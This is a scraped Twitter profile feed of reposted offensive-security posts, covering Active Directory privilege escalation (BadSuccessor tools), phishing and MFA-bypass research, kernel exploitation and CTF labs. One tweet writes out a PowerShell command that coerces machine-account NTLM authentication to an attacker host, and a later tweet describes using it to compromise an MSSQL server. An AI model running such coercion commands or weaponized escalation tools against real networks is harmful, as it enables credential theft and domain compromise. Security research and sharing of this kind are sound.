Opcode (@opcode__) 's Twitter Profile
Opcode

@opcode__

Average CTF enjoyer

ID: 1495073392567144448

calendar_today19-02-2022 16:31:12

1,1K Tweet

71 Followers

217 Following

Mayfly (@m4yfly) 's Twitter Profile Photo

Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵

Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?

Simply use: 
powershell iwr http://192.168.56.1 -UseDefaultCredentials 
To get an HTTP coerce of the machine account.
👇🧵
quarkslab (@quarkslab) 's Twitter Profile Photo

From classic HTML pages to advanced MFA bypasses, dive in with Atsika in an exploration of phishing techniques 🎣. Learn some infrastructure tricks and delivery methods to bypass common detection. 👉blog.quarkslab.com/technical-dive… (promise this one is legit 👀)

From classic HTML pages to advanced MFA bypasses, dive in with <a href="/_atsika/">Atsika</a> in an exploration of phishing techniques 🎣. 
Learn some infrastructure tricks and delivery methods to bypass common detection.  
👉blog.quarkslab.com/technical-dive…
(promise this one is legit 👀)
Linux Kernel Security (@linkersec) 's Twitter Profile Photo

Linux Kernel Exploitation series Awesome series of articles by r1ru that outlines many commonly-used modern exploitation techniques. r1ru.github.io/categories/lin…

Linux Kernel Exploitation series

Awesome series of articles by <a href="/ri5255/">r1ru</a> that outlines many commonly-used modern exploitation techniques.

r1ru.github.io/categories/lin…
volatility (@volatility) 's Twitter Profile Photo

We are very excited to announce that Volatility 3 has reached parity with Volatility 2! With this achievement, Volatility 2 is now deprecated. See the full details in our blog post: volatilityfoundation.org/announcing-the…

daem0nc0re (@daem0nc0re) 's Twitter Profile Photo

PowerShell's Test-NetConnection is too slow, so I wrote a simple function to check if specific TCP ports are opened quickly without ping. Would be helpful TCP port sweeping. gist.github.com/daem0nc0re/1ec…

PowerShell's Test-NetConnection is too slow, so I wrote a simple function to check if specific TCP ports are opened quickly without ping.
Would be helpful TCP port sweeping.
gist.github.com/daem0nc0re/1ec…
mpgn (@mpgn_x64) 's Twitter Profile Photo

Thanks to the awesome work of Aleem Ladha , the CTF Windows Active Directory lab for Barbhack from 2024 is now public! 🔥 You can build the lab and pwn the AD—13 flags to capture! No public write-up exists yet—waiting for someone to submit one! github.com/Pennyw0rth/Net…

DebugPrivilege (@debugprivilege) 's Twitter Profile Photo

Decided to dive into the internals of Volume Shadow Copy (VSS). If you're curious about how the different VSS components work together, check this out: medium.com/@Debugger/insi…

Project Sekai CTF (@projectsekaictf) 's Twitter Profile Photo

We played Midnight Sun CTF Quals this weekend with r3kapig and secured 3rd place with a full solve! Look forward to meeting all finalists in 🇸🇪 Stockholm this June :)

We played Midnight Sun CTF Quals this weekend with <a href="/r3kapig/">r3kapig</a> and secured 3rd place with a full solve! Look forward to meeting all finalists in 🇸🇪 Stockholm this June :)
TrustedSec (@trustedsec) 's Twitter Profile Photo

Microsoft Deployment Toolkit (MDT) is often overlooked but shares are a goldmine of valuable info for red teamers. In our latest blog, Oddvar Moe walks through how to set up MDT and best practices for managing and protecting credentials. Read it now! trustedsec.com/blog/red-team-…

Yuval Gordon (@yug0rd) 's Twitter Profile Photo

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️ Read Here - akamai.com/blog/security-…

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️
Read Here - akamai.com/blog/security-…
LuemmelSec (@theluemmel) 's Twitter Profile Photo

Took Akamai Security Intelligence Group's script for BadSuccessor and improved it a bit. - runs from non domain joined systems - works in forests - prints the rights each entity has on a OU - pre-flight check if 2025 DCs are present - code changes here and there github.com/LuemmelSec/Pen…

Took <a href="/akamai_research/">Akamai Security Intelligence Group</a>'s script for BadSuccessor and improved it a bit. 
- runs from non domain joined systems
- works in forests 
- prints the rights each entity has on a OU
- pre-flight check if 2025 DCs are present
- code changes here and there
github.com/LuemmelSec/Pen…
mpgn (@mpgn_x64) 's Twitter Profile Photo

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥 github.com/Pennyw0rth/Net…

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥

github.com/Pennyw0rth/Net…
Logan Goins (@_logangoins) 's Twitter Profile Photo

I'm super happy to announce an operationally weaponized version of Yuval Gordon's BadSuccessor in .NET format! With a minimum of "CreateChild" privileges over any OU it allows for automatic escalation to Domain Admin (DA). Enjoy your inline .NET execution! github.com/logangoins/Sha…

Garrett (@unsigned_sh0rt) 's Twitter Profile Photo

Friend recently used this trick posted by Mayfly x.com/M4yFly/status/… to pop a MSSQL box on a non-evasive using xp_cmdshell since EDR was being annoying. It made me curious if there were other ways to trigger HTTP auth for priv esc.